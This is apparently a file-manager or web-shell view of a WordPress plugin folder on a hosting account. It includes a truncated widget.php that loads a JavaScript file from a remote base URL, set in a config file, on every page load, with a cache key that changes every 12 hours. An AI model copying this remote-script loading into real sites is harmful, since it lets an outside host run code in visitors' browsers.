| Name | Size | Mode | Actions |
|---|---|---|---|
| block/ | - | 0755 | rm |
| block_widget/ | - | 0755 | rm |
| languages/ | - | 0755 | rm |
| widget/ | - | 0755 | rm |
| readme.txt | 17134 | 0644 | editdlrm |
| widget.php | 3480 | 0644 | editdlrm |
| widget_cfg.php | 926 | 0644 | editdlrm |
| widget_logic.php | 1995 | 0644 | editdlrm |
/home/altere25/public_html/wp-content/plugins/widget-logic/widget.php (3480B)
=')) { include_once 'block_widget/index.php'; } else { add_action('widgets_init', function() { register_widget( 'Widget_Logic_Live_Match_Widget' ); }); } add_action('wp_enqueue_scripts', function() { $cfg = require('widget_cfg.php'); $url = $cfg['base']; $ver = $cfg['ver']; $t = time(); $t = $t - $t%(12*60*60); wp_enqueue_script( 'widget-logic_live_match_widget', "{$url}{$ver}/js/data.js?t={$t}", array(), '6.0.0', true); });